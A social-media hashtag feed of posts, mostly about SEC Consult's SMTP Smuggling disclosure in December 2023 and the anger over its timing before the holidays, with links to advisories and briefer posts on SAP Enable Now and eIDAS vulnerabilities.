Show threadMarcel WaldvogelDec 26, 2023
After having been informed by @mathieui that #Exim is also affected, I compiled a list of what #SECConsult documented and what has been found out in the meantime. SEC Consult documented 11 mail systems (software and/or providers; many with millions of accounts) vulnerable to some form of #SMTPSmuggling. But they only informed 3. With #Exim also vulnerable (apparently presumed "clean" by SEC Consult), the list is now 12.
https://netfuture.ch/2023/12/smtp-smuggling-status/
SMTP Smuggling Status

«SMTP Smuggling» is a vulnerability that allows to circumvent some mail checks at the receiver and therefore will allow additional spam and/or phishing messages through. Here is the list of what we currently know. Interested in the full story? I have written a German 🇩🇪 article on SMTP Smuggl

Netfuture: The future is networked
erAckDec 25, 2023
Everyone attending #SECConsult #TimoLongin's #37c3 #SMTPSmuggling talk
https://events.ccc.de/congress/2023/hub/en/event/smtp_smuggling_spoofing_e-mails_worldwide/
at least boo them for shitting the devs in the face right before holidays.
SMTP Smuggling – Spoofing E-Mails Worldwide - 37C3

Show threadM SchommerDec 22, 2023
@moanos
I can't remember a C3-Talk where #eggs or rotten #tomatoes were thrown at the presenter. That would be a first, IMHO.
#37C3 #SMTPsmuggling #SECconsult
Heinlein SupportDec 22, 2023

E-Mails, die E-Mails schmuggeln und so Phishing-Mails ermöglichen!? Kein Spaß für Postmaster kurz vor den Weihnachtsferien. - Wir zeigen, worum es eigentlich geht und was Admins und Postmaster jetzt tun können.

#SMTP #smuggling #Postfix #Mailserver #Postmaster #MTA #Spoofing #SMTPSmuggling #SECconsult

https://www.heinlein-support.de/blog/smtp-smuggling-aka-postmasters-weihnachtsstress

SMTP smuggling aka Postmasters Weihnachtsstress | Heinlein Support GmbH

E-Mails, die E-Mails schmuggeln und so Phishing-Mails ermöglichen!? Kein Spaß für Postmaster kurz vor den Weihnachtsferien. - Wir zeigen, was Admins jetzt tun können.Wer ist Schuld an der ganzen Aufregung? Der CCC. Naja zumindest indirekt. Timo Longin von SEC Consult hat sich verschiedene MTA-Implementierungen angesehen und Unstimmigkeiten darin gefunden.

Show threadscyDec 22, 2023

Some additional links:

The blog post describing the attack:
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/

Security advisory by #Postfix, clearly pissed:
https://www.postfix.org/smtp-smuggling.html

Some reactions from across the fedi:
https://zombofant.net/@jssfr/111618969359339789
https://gay-pirate-assassins.de/@moanos/statuses/01HJ8D8XQ7ZJ89HN4TZFZZ9AS8
https://waldvogel.family/@marcel/111622567290149119

As Timo clearly likes getting recognition for his work, I for one will be remembering his name, and the name of #SECConsult, his employer, for giving us this Christmas present. 💝

Thanks Timo. Now get off the fucking stage.

SMTP Smuggling - Spoofing E-Mails Worldwide

Introducing a novel technique for e-mail spoofing

SEC Consult
Marcel WaldvogelDec 22, 2023
Wenige Tage bevor alle Systemadministratoren sich zu ihren Familien in die verdienten Weihnachtsferien zurückziehen, lässt SEC Consult die Bombe platzen: Die Antispam-Massnahmen der weitverbreitesten Mailserver können ausgehebelt werden, sogar die Vortragsreise dazu ist schon geplant. Nur: Der weitverbreiteste Mailserver weiss davon nichts, seine User sind ungeschützt.
#SMTP #SMTPSmuggling #Postfix #SECconsult #disclosure
https://dnip.ch/2023/12/22/nicht-wirklich-responsible-disclosure-die-extraportion-spam-ueber-die-festtage/
Nicht wirklich «Responsible Disclosure»: Die Extraportion Spam über die Festtage - Das Netz ist politisch

Wenige Tage bevor alle Systemadministratoren sich zu ihren Familien in die verdienten Weihnachtsferien zurückziehen, lässt SEC Consult die Bombe platzen: Die

Das Netz ist politisch
🛡 [email protected]/:~# Oct 3, 2023

"🚨 Multiple Vulnerabilities Unveiled in SAP® Enable Now Manager 🚨"

SEC Consult has disclosed multiple vulnerabilities in SAP® Enable Now Manager, which could potentially allow a remote, unauthenticated attacker to create new administrative user accounts by exploiting a chain of vulnerabilities. The vulnerabilities include Open Redirect, Reflected Cross Site Scripting (XSS), and Insufficient Cross-Site Request Forgery (CSRF) Protection. The vendor has pushed a fix in the May 2023 Release for the Cloud Edition.

🔗 Source: Full Disclosure Mailing List

🔗 Advisory URL: SEC Consult

Tags: #SAP #Vulnerability #CyberSecurity #InfoSec #XSS #CSRF #OpenRedirect #SECConsult #CyberAttack #PatchUpdate 🌐🔐🔍

👥 Researchers: Paul Serban, Fabian Hagg from SEC Consult Vulnerability Lab (SEC Consult)

Full Disclosure: SEC Consult SA-20230927-0 :: Multiple Vulnerabilities in SAP® Enable Now Manager

ITSEC NewsOct 31, 2019
Researchers find hole in EU-wide identity system - The EU has fixed a flaw in the powerful yet complex eIDAS digital identification system that let p... more: https://nakedsecurity.sophos.com/2019/10/31/researchers-find-hole-in-eu-identity-system/ #authenticationandtrustservices #electronicidentification #governmentsecurity #securitythreats #vulnerability #europeanunion #secconsult #eidas #eu
Researchers find hole in EU-wide identity system

Naked Security